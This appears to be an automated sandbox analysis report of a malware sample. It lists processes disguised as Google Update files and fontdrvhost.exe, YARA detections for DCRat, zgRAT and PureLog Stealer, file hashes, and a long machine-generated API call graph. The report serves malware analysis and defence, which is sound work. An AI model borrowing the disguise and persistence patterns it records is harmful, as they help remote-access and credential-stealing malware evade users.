                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                                                  Imagebase:0x590000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:25
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                                                  Imagebase:0x860000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                  Imagebase:0x130000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:32
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat"
                                                                                                                  Imagebase:0x7ff6eb530000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:33
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:34
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff70f940000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:35
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff666e00000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:40
                                                                                                                  Start time:10:02:20
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Drivers\fontdrvhost.exe"
                                                                                                                  Imagebase:0x460000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1513
                                                                                                                    Total number of Limit Nodes:28
24624 b9ac04 SetCurrentDirectoryW 24505->24624 24513 b8e617 53 API calls 24506->24513 24515 b9c03b 24507->24515 24508 b9c18b 24510 b9c19d 24508->24510 24511 b9c194 EnableWindow 24508->24511 24509->24492 24516 b9c1ba 24510->24516 24732 b812d3 GetDlgItem EnableWindow 24510->24732 24511->24510 24512 b9beed 24519 b8e617 53 API calls 24512->24519 24517 b9c017 SetDlgItemTextW 24513->24517 24525 b9c04d 24515->24525 24551 b9c072 24515->24551 24522 b9c1e1 24516->24522 24536 b9c1d9 SendMessageW 24516->24536 24517->24499 24518 b9ba87 24523 b9ba9e 24518->24523 24524 b9ba90 GetLastError 24518->24524 24519->24444 24520 b9c0cb 24528 b9c73f 97 API calls 24520->24528 24522->24444 24537 b8e617 53 API calls 24522->24537 24529 b9bb11 24523->24529 24532 b9bb20 24523->24532 24538 b9baae GetTickCount 24523->24538 24524->24523 24730 b99ed5 32 API calls 24525->24730 24526 b9c1b0 24733 b812d3 GetDlgItem EnableWindow 24526->24733 24527->24512 24531 b8e617 53 API calls 24527->24531 24528->24560 24529->24532 24533 b9bd56 24529->24533 24540 b9bed0 24531->24540 24542 b9bcfb 24532->24542 24543 b9bb39 GetModuleFileNameW 24532->24543 24544 b9bcf1 24532->24544 24633 b812f1 GetDlgItem ShowWindow 24533->24633 24534 b9c066 24534->24551 24536->24522 24537->24476 24539 b84092 _swprintf 51 API calls 24538->24539 24546 b9bac7 24539->24546 24547 b84092 _swprintf 51 API calls 24540->24547 24541 b9c169 24731 b99ed5 32 API calls 24541->24731 24550 b8e617 53 API calls 24542->24550 24724 b8f28c 82 API calls 24543->24724 24544->24451 24544->24542 24625 b8966e 24546->24625 24547->24512 24556 b9bd05 24550->24556 24551->24520 24557 b9c73f 97 API calls 24551->24557 24552 b9bd66 24634 b812f1 GetDlgItem ShowWindow 24552->24634 24553 b8e617 53 API calls 24553->24560 24554 b9c188 24554->24508 24555 b9bb5f 24561 b84092 _swprintf 51 API calls 24555->24561 24562 b84092 _swprintf 51 API calls 24556->24562 24563 b9c0a0 24557->24563 24559 b9bd70 24564 b8e617 53 API calls 24559->24564 24560->24508 24560->24541 24560->24553 
24566 b9bb81 CreateFileMappingW 24561->24566 24567 b9bd23 24562->24567 24563->24520 24568 b9c0a9 DialogBoxParamW 24563->24568 24569 b9bd7a SetDlgItemTextW 24564->24569 24571 b9bbe3 GetCommandLineW 24566->24571 24602 b9bc60 __InternalCxxFrameHandler 24566->24602 24580 b8e617 53 API calls 24567->24580 24568->24451 24568->24520 24635 b812f1 GetDlgItem ShowWindow 24569->24635 24570 b9baed 24574 b9baff 24570->24574 24575 b9baf4 GetLastError 24570->24575 24576 b9bbf4 24571->24576 24572 b9bc6b ShellExecuteExW 24597 b9bc88 24572->24597 24578 b8959a 80 API calls 24574->24578 24575->24574 24725 b9b425 SHGetMalloc 24576->24725 24577 b9bd8c SetDlgItemTextW GetDlgItem 24581 b9bda9 GetWindowLongW SetWindowLongW 24577->24581 24582 b9bdc1 24577->24582 24578->24529 24584 b9bd3d 24580->24584 24581->24582 24636 b9c73f 24582->24636 24583 b9bc10 24726 b9b425 SHGetMalloc 24583->24726 24588 b9bc1c 24727 b9b425 SHGetMalloc 24588->24727 24589 b9bccb 24589->24544 24595 b9bce1 UnmapViewOfFile CloseHandle 24589->24595 24590 b9c73f 97 API calls 24592 b9bddd 24590->24592 24661 b9da52 24592->24661 24593 b9bc28 24728 b8f3fa 82 API calls 2 library calls 24593->24728 24595->24544 24597->24589 24600 b9bcb7 Sleep 24597->24600 24599 b9bc3f MapViewOfFile 24599->24602 24600->24589 24600->24597 24601 b9c73f 97 API calls 24605 b9be03 24601->24605 24602->24572 24603 b9be2c 24729 b812d3 GetDlgItem EnableWindow 24603->24729 24605->24603 24607 b9c73f 97 API calls 24605->24607 24606->24451 24606->24477 24607->24603 24609 b81378 24608->24609 24610 b8131f 24608->24610 24735 b8e2c1 GetWindowLongW SetWindowLongW 24609->24735 24611 b81385 24610->24611 24734 b8e2e8 62 API calls 2 library calls 24610->24734 24611->24444 24611->24445 24611->24446 24614 b81341 24614->24611 24615 b81354 GetDlgItem 24614->24615 24615->24611 24616 b81364 24615->24616 24616->24611 24617 b8136a SetWindowTextW 24616->24617 24617->24611 24621 b8a0bb 24618->24621 24619 b8a14c 24620 b8a2b2 8 API calls 24619->24620 24622 b8a175 24619->24622 
24620->24622 24621->24619 24621->24622 24736 b8a2b2 24621->24736 24622->24504 24622->24505 24624->24518 24626 b89678 24625->24626 24627 b896d5 CreateFileW 24626->24627 24628 b896c9 24626->24628 24627->24628 24629 b8bb03 GetCurrentDirectoryW 24628->24629 24630 b8971f 24628->24630 24631 b89704 24629->24631 24630->24570 24631->24630 24632 b89708 CreateFileW 24631->24632 24632->24630 24633->24552 24634->24559 24635->24577 24637 b9c749 __EH_prolog 24636->24637 24642 b9bdcf 24637->24642 24768 b9b314 24637->24768 24640 b9b314 ExpandEnvironmentStringsW 24651 b9c780 _wcslen _wcsrchr 24640->24651 24641 b9ca67 SetWindowTextW 24641->24651 24642->24590 24647 b9c855 SetFileAttributesW 24649 b9c90f GetFileAttributesW 24647->24649 24660 b9c86f _abort _wcslen 24647->24660 24649->24651 24652 b9c921 DeleteFileW 24649->24652 24651->24640 24651->24641 24651->24642 24651->24647 24653 b9cc31 GetDlgItem SetWindowTextW SendMessageW 24651->24653 24657 b9cc71 SendMessageW 24651->24657 24772 b91fbb CompareStringW 24651->24772 24773 b9a64d GetCurrentDirectoryW 24651->24773 24775 b8a5d1 6 API calls 24651->24775 24776 b8a55a FindClose 24651->24776 24777 b9b48e 76 API calls 2 library calls 24651->24777 24778 ba3e3e 24651->24778 24652->24651 24654 b9c932 24652->24654 24653->24651 24655 b84092 _swprintf 51 API calls 24654->24655 24656 b9c952 GetFileAttributesW 24655->24656 24656->24654 24658 b9c967 MoveFileW 24656->24658 24657->24651 24658->24651 24659 b9c97f MoveFileExW 24658->24659 24659->24651 24660->24649 24660->24651 24774 b8b991 51 API calls 2 library calls 24660->24774 24662 b9da5c __EH_prolog 24661->24662 24793 b90659 24662->24793 24664 b9da8d 24797 b85b3d 24664->24797 24666 b9daab 24801 b87b0d 24666->24801 24670 b9dafe 24817 b87b9e 24670->24817 24672 b9bdee 24672->24601 24674 b9d6a8 24673->24674 24675 b9a5c6 4 API calls 24674->24675 24676 b9d6ad 24675->24676 24677 b9d6b5 GetWindow 24676->24677 24678 b9bf15 24676->24678 24677->24678 24679 b9d6d5 24677->24679 24678->24453 24678->24454 
24679->24678 24680 b9d6e2 GetClassNameW 24679->24680 24682 b9d76a GetWindow 24679->24682 24683 b9d706 GetWindowLongW 24679->24683 25298 b91fbb CompareStringW 24680->25298 24682->24678 24682->24679 24683->24682 24684 b9d716 SendMessageW 24683->24684 24684->24682 24685 b9d72c GetObjectW 24684->24685 25299 b9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24685->25299 24687 b9d743 25300 b9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24687->25300 25301 b9a80c 8 API calls 24687->25301 24690 b9d754 SendMessageW DeleteObject 24690->24682 24691->24466 24693 b9abcc 24692->24693 24694 b9abf1 24692->24694 25302 b91fbb CompareStringW 24693->25302 24695 b9abff 24694->24695 24696 b9abf6 SHAutoComplete 24694->24696 24700 b9b093 24695->24700 24696->24695 24698 b9abdf 24698->24694 24699 b9abe3 FindWindowExW 24698->24699 24699->24694 24701 b9b09d __EH_prolog 24700->24701 24702 b813dc 84 API calls 24701->24702 24703 b9b0bf 24702->24703 25303 b81fdc 24703->25303 24706 b9b0d9 24708 b81692 86 API calls 24706->24708 24707 b9b0eb 24709 b819af 128 API calls 24707->24709 24710 b9b0e4 24708->24710 24712 b9b10d __InternalCxxFrameHandler ___std_exception_copy 24709->24712 24710->24493 24710->24497 24711 b81692 86 API calls 24711->24710 24712->24711 24713->24476 25311 b9b568 PeekMessageW 24714->25311 24717 b9d502 24721 b9d50d ShowWindow SendMessageW SendMessageW 24717->24721 24718 b9d536 SendMessageW SendMessageW 24719 b9d591 SendMessageW SendMessageW SendMessageW 24718->24719 24720 b9d572 24718->24720 24722 b9d5c4 SendMessageW 24719->24722 24723 b9d5e7 SendMessageW 24719->24723 24720->24719 24721->24718 24722->24723 24723->24492 24724->24555 24725->24583 24726->24588 24727->24593 24728->24599 24729->24606 24730->24534 24731->24554 24732->24526 24733->24516 24734->24614 24735->24611 24737 b8a2bf 24736->24737 24738 b8a2e3 24737->24738 24739 b8a2d6 CreateDirectoryW 24737->24739 24757 b8a231 24738->24757 24739->24738 24741 b8a316 24739->24741 24744 b8a325 24741->24744 24749 b8a4ed 
24741->24749 24743 b8a329 GetLastError 24743->24744 24744->24621 24745 b8bb03 GetCurrentDirectoryW 24747 b8a2ff 24745->24747 24747->24743 24748 b8a303 CreateDirectoryW 24747->24748 24748->24741 24748->24743 24750 b9ec50 24749->24750 24751 b8a4fa SetFileAttributesW 24750->24751 24752 b8a53d 24751->24752 24753 b8a510 24751->24753 24752->24744 24754 b8bb03 GetCurrentDirectoryW 24753->24754 24755 b8a524 24754->24755 24755->24752 24756 b8a528 SetFileAttributesW 24755->24756 24756->24752 24760 b8a243 24757->24760 24761 b9ec50 24760->24761 24762 b8a250 GetFileAttributesW 24761->24762 24763 b8a23a 24762->24763 24764 b8a261 24762->24764 24763->24743 24763->24745 24765 b8bb03 GetCurrentDirectoryW 24764->24765 24766 b8a275 24765->24766 24766->24763 24767 b8a279 GetFileAttributesW 24766->24767 24767->24763 24769 b9b31e 24768->24769 24770 b9b40d 24769->24770 24771 b9b3f0 ExpandEnvironmentStringsW 24769->24771 24770->24651 24771->24770 24772->24651 24773->24651 24774->24660 24775->24651 24776->24651 24777->24651 24779 ba8e54 24778->24779 24780 ba8e6c 24779->24780 24781 ba8e61 24779->24781 24783 ba8e74 24780->24783 24789 ba8e7d _free 24780->24789 24782 ba8e06 __vswprintf_c_l 21 API calls 24781->24782 24788 ba8e69 24782->24788 24784 ba8dcc _free 20 API calls 24783->24784 24784->24788 24785 ba8e82 24791 ba91a8 20 API calls _free 24785->24791 24786 ba8ea7 HeapReAlloc 24786->24788 24786->24789 24788->24651 24789->24785 24789->24786 24792 ba7a5e 7 API calls 2 library calls 24789->24792 24791->24788 24792->24789 24794 b90666 _wcslen 24793->24794 24821 b817e9 24794->24821 24796 b9067e 24796->24664 24798 b90659 _wcslen 24797->24798 24799 b817e9 78 API calls 24798->24799 24800 b9067e 24799->24800 24800->24666 24802 b87b17 __EH_prolog 24801->24802 24838 b8ce40 24802->24838 24804 b87b32 24805 b9eb38 8 API calls 24804->24805 24806 b87b5c 24805->24806 24844 b94a76 24806->24844 24809 b87c7d 24810 b87c87 24809->24810 24812 b87cf1 24810->24812 24873 b8a56d 24810->24873 24815 b87d50 24812->24815 
24851 b88284 24812->24851 24813 b87d92 24813->24670 24815->24813 24879 b8138b 74 API calls 24815->24879 24818 b87bac 24817->24818 24820 b87bb3 24817->24820 24819 b92297 86 API calls 24818->24819 24819->24820 24822 b817ff 24821->24822 24833 b8185a __InternalCxxFrameHandler 24821->24833 24823 b81828 24822->24823 24834 b86c36 76 API calls __vswprintf_c_l 24822->24834 24825 b81887 24823->24825 24828 b81847 ___std_exception_copy 24823->24828 24827 ba3e3e 22 API calls 24825->24827 24826 b8181e 24835 b86ca7 75 API calls 24826->24835 24830 b8188e 24827->24830 24828->24833 24836 b86ca7 75 API calls 24828->24836 24830->24833 24837 b86ca7 75 API calls 24830->24837 24833->24796 24834->24826 24835->24823 24836->24833 24837->24833 24839 b8ce4a __EH_prolog 24838->24839 24840 b9eb38 8 API calls 24839->24840 24841 b8ce8d 24840->24841 24842 b9eb38 8 API calls 24841->24842 24843 b8ceb1 24842->24843 24843->24804 24845 b94a80 __EH_prolog 24844->24845 24846 b9eb38 8 API calls 24845->24846 24847 b94a9c 24846->24847 24848 b87b8b 24847->24848 24850 b90e46 80 API calls 24847->24850 24848->24809 24850->24848 24852 b8828e __EH_prolog 24851->24852 24880 b813dc 24852->24880 24854 b882aa 24855 b882bb 24854->24855 25023 b89f42 24854->25023 24858 b882f2 24855->24858 24888 b81a04 24855->24888 25019 b81692 24858->25019 24861 b882ee 24861->24858 24869 b8a56d 7 API calls 24861->24869 24871 b88389 24861->24871 25027 b8c0c5 CompareStringW _wcslen 24861->25027 24864 b883e8 24915 b81f6d 24864->24915 24869->24861 24870 b883f3 24870->24858 24919 b83b2d 24870->24919 24931 b8848e 24870->24931 24907 b88430 24871->24907 24874 b8a582 24873->24874 24878 b8a5b0 24874->24878 25287 b8a69b 24874->25287 24876 b8a592 24877 b8a597 FindClose 24876->24877 24876->24878 24877->24878 24878->24810 24879->24813 24881 b813e1 __EH_prolog 24880->24881 24882 b8ce40 8 API calls 24881->24882 24883 b81419 24882->24883 24884 b9eb38 8 API calls 24883->24884 24887 b81474 _abort 24883->24887 24885 b81461 24884->24885 24885->24887 25028 
b8b505 24885->25028 24887->24854 24889 b81a0e __EH_prolog 24888->24889 24901 b81a61 24889->24901 24904 b81b9b 24889->24904 25044 b813ba 24889->25044 24891 b81bc7 25047 b8138b 74 API calls 24891->25047 24894 b83b2d 101 API calls 24898 b81c12 24894->24898 24895 b81bd4 24895->24894 24895->24904 24896 b81c5a 24900 b81c8d 24896->24900 24896->24904 25048 b8138b 74 API calls 24896->25048 24898->24896 24899 b83b2d 101 API calls 24898->24899 24899->24898 24900->24904 24905 b89e80 79 API calls 24900->24905 24901->24891 24901->24895 24901->24904 24902 b83b2d 101 API calls 24903 b81cde 24902->24903 24903->24902 24903->24904 24904->24861 24905->24903 24906 b89e80 79 API calls 24906->24901 25066 b8cf3d 24907->25066 24909 b88440 25070 b913d2 GetSystemTime SystemTimeToFileTime 24909->25070 24911 b883a3 24911->24864 24912 b91b66 24911->24912 25071 b9de6b 24912->25071 24916 b81f72 __EH_prolog 24915->24916 24918 b81fa6 24916->24918 25079 b819af 24916->25079 24918->24870 24920 b83b39 24919->24920 24921 b83b3d 24919->24921 24920->24870 24930 b89e80 79 API calls 24921->24930 24922 b83b4f 24923 b83b78 24922->24923 24924 b83b6a 24922->24924 25210 b8286b 101 API calls 3 library calls 24923->25210 24926 b83baa 24924->24926 25209 b832f7 89 API calls 2 library calls 24924->25209 24926->24870 24928 b83b76 24928->24926 25211 b820d7 74 API calls 24928->25211 24930->24922 24932 b88498 __EH_prolog 24931->24932 24935 b884d5 24932->24935 24942 b88513 24932->24942 25236 b98c8d 103 API calls 24932->25236 24934 b884f5 24936 b884fa 24934->24936 24937 b8851c 24934->24937 24935->24934 24940 b8857a 24935->24940 24935->24942 24936->24942 25237 b87a0d 152 API calls 24936->25237 24937->24942 25238 b98c8d 103 API calls 24937->25238 24940->24942 25212 b85d1a 24940->25212 24942->24870 24943 b88605 24943->24942 25218 b88167 24943->25218 24946 b88797 24947 b8a56d 7 API calls 24946->24947 24950 b88802 24946->24950 24947->24950 24949 b8d051 82 API calls 24951 b8885d 24949->24951 25224 b87c0d 24950->25224 
24951->24942 24951->24949 24952 b88992 24951->24952 24954 b8898b 24951->24954 25239 b88117 84 API calls 24951->25239 25240 b82021 74 API calls 24951->25240 24953 b88a5f 24952->24953 24959 b889e1 24952->24959 24958 b88ab6 24953->24958 24969 b88a6a 24953->24969 25241 b82021 74 API calls 24954->25241 24957 b88b14 24978 b88b82 24957->24978 25007 b89105 24957->25007 25245 b898bc 24957->25245 24967 b88a4c 24958->24967 25244 b87fc0 97 API calls 24958->25244 24959->24957 24961 b8a231 3 API calls 24959->24961 24959->24967 24960 b8959a 80 API calls 24960->24942 24965 b88a19 24961->24965 24963 b8959a 80 API calls 24963->24942 24964 b88ab4 24964->24960 24965->24967 25242 b892a3 97 API calls 24965->25242 24966 b8ab1a 8 API calls 24970 b88bd1 24966->24970 24967->24957 24967->24964 24969->24964 25243 b87db2 101 API calls 24969->25243 24973 b8ab1a 8 API calls 24970->24973 24988 b88be7 24973->24988 24976 b88b70 25249 b86e98 77 API calls 24976->25249 24978->24966 24979 b88cbc 24980 b88d18 24979->24980 24981 b88e40 24979->24981 24982 b88d8a 24980->24982 24985 b88d28 24980->24985 24983 b88e52 24981->24983 24984 b88e66 24981->24984 25004 b88d49 24981->25004 24992 b88167 19 API calls 24982->24992 24986 b89215 123 API calls 24983->24986 24987 b93377 75 API calls 24984->24987 24989 b88d6e 24985->24989 24996 b88d37 24985->24996 24986->25004 24990 b88e7f 24987->24990 24988->24979 24991 b88c93 24988->24991 24998 b8981a 79 API calls 24988->24998 24989->25004 25252 b877b8 111 API calls 24989->25252 25255 b93020 123 API calls 24990->25255 24991->24979 25250 b89a3c 82 API calls 24991->25250 24995 b88dbd 24992->24995 25000 b88df5 24995->25000 25001 b88de6 24995->25001 24995->25004 25251 b82021 74 API calls 24996->25251 24998->24991 25254 b89155 93 API calls __EH_prolog 25000->25254 25253 b87542 85 API calls 25001->25253 25008 b88f85 25004->25008 25256 b82021 74 API calls 25004->25256 25006 b89090 25006->25007 25009 b8a4ed 3 API calls 25006->25009 25007->24963 25008->25006 25008->25007 25010 
b8903e 25008->25010 25230 b89f09 SetEndOfFile 25008->25230 25011 b890eb 25009->25011 25231 b89da2 25010->25231 25011->25007 25257 b82021 74 API calls 25011->25257 25014 b89085 25016 b89620 77 API calls 25014->25016 25016->25006 25017 b890fb 25258 b86dcb 76 API calls 25017->25258 25020 b816a4 25019->25020 25274 b8cee1 25020->25274 25024 b89f59 25023->25024 25025 b89f63 25024->25025 25286 b86d0c 78 API calls 25024->25286 25025->24855 25027->24861 25029 b8b50f __EH_prolog 25028->25029 25034 b8f1d0 82 API calls 25029->25034 25031 b8b521 25035 b8b61e 25031->25035 25034->25031 25036 b8b630 _abort 25035->25036 25039 b910dc 25036->25039 25042 b9109e GetCurrentProcess GetProcessAffinityMask 25039->25042 25043 b8b597 25042->25043 25043->24887 25049 b81732 25044->25049 25046 b813d6 25046->24906 25047->24904 25048->24900 25050 b81748 25049->25050 25061 b817a0 __InternalCxxFrameHandler 25049->25061 25051 b81771 25050->25051 25062 b86c36 76 API calls __vswprintf_c_l 25050->25062 25052 b817c7 25051->25052 25058 b8178d ___std_exception_copy 25051->25058 25054 ba3e3e 22 API calls 25052->25054 25056 b817ce 25054->25056 25055 b81767 25063 b86ca7 75 API calls 25055->25063 25056->25061 25065 b86ca7 75 API calls 25056->25065 25058->25061 25064 b86ca7 75 API calls 25058->25064 25061->25046 25062->25055 25063->25051 25064->25061 25065->25061 25067 b8cf4d 25066->25067 25069 b8cf54 25066->25069 25068 b8981a 79 API calls 25067->25068 25068->25069 25069->24909 25070->24911 25072 b9de78 25071->25072 25073 b8e617 53 API calls 25072->25073 25074 b9de9b 25073->25074 25075 b84092 _swprintf 51 API calls 25074->25075 25076 b9dead 25075->25076 25077 b9d4d4 16 API calls 25076->25077 25078 b91b7c 25077->25078 25078->24864 25080 b819bf 25079->25080 25082 b819bb 25079->25082 25083 b818f6 25080->25083 25082->24918 25084 b81908 25083->25084 25085 b81945 25083->25085 25086 b83b2d 101 API calls 25084->25086 25091 b83fa3 25085->25091 25090 b81928 25086->25090 25090->25082 25095 b83fac 25091->25095 25092 
b83b2d 101 API calls 25092->25095 25093 b81966 25093->25090 25096 b81e50 25093->25096 25095->25092 25095->25093 25108 b90e08 25095->25108 25097 b81e5a __EH_prolog 25096->25097 25116 b83bba 25097->25116 25099 b81e84 25100 b81732 78 API calls 25099->25100 25102 b81f0b 25099->25102 25101 b81e9b 25100->25101 25144 b818a9 78 API calls 25101->25144 25102->25090 25104 b81eb3 25105 b81ebf _wcslen 25104->25105 25145 b91b84 MultiByteToWideChar 25104->25145 25146 b818a9 78 API calls 25105->25146 25109 b90e0f 25108->25109 25110 b90e2a 25109->25110 25114 b86c31 RaiseException CallUnexpected 25109->25114 25112 b90e3b SetThreadExecutionState 25110->25112 25115 b86c31 RaiseException CallUnexpected 25110->25115 25112->25095 25114->25110 25115->25112 25117 b83bc4 __EH_prolog 25116->25117 25118 b83bda 25117->25118 25119 b83bf6 25117->25119 25172 b8138b 74 API calls 25118->25172 25121 b83e51 25119->25121 25124 b83c22 25119->25124 25189 b8138b 74 API calls 25121->25189 25123 b83be5 25123->25099 25124->25123 25147 b93377 25124->25147 25126 b83ca3 25127 b83d2e 25126->25127 25143 b83c9a 25126->25143 25175 b8d051 25126->25175 25157 b8ab1a 25127->25157 25128 b83c9f 25128->25126 25174 b820bd 78 API calls 25128->25174 25130 b83c8f 25173 b8138b 74 API calls 25130->25173 25131 b83c71 25131->25126 25131->25128 25131->25130 25134 b83d41 25137 b83dd7 25134->25137 25138 b83dc7 25134->25138 25181 b93020 123 API calls 25137->25181 25161 b89215 25138->25161 25141 b83dd5 25141->25143 25182 b82021 74 API calls 25141->25182 25183 b92297 25143->25183 25144->25104 25145->25105 25146->25102 25148 b9338c 25147->25148 25150 b93396 ___std_exception_copy 25147->25150 25190 b86ca7 75 API calls 25148->25190 25151 b934c6 25150->25151 25154 b9341c 25150->25154 25156 b93440 _abort 25150->25156 25192 ba238d RaiseException 25151->25192 25191 b932aa 75 API calls 3 library calls 25154->25191 25155 b934f2 25156->25131 25158 b8ab28 25157->25158 25160 b8ab32 25157->25160 25159 b9eb38 8 API calls 25158->25159 25159->25160 
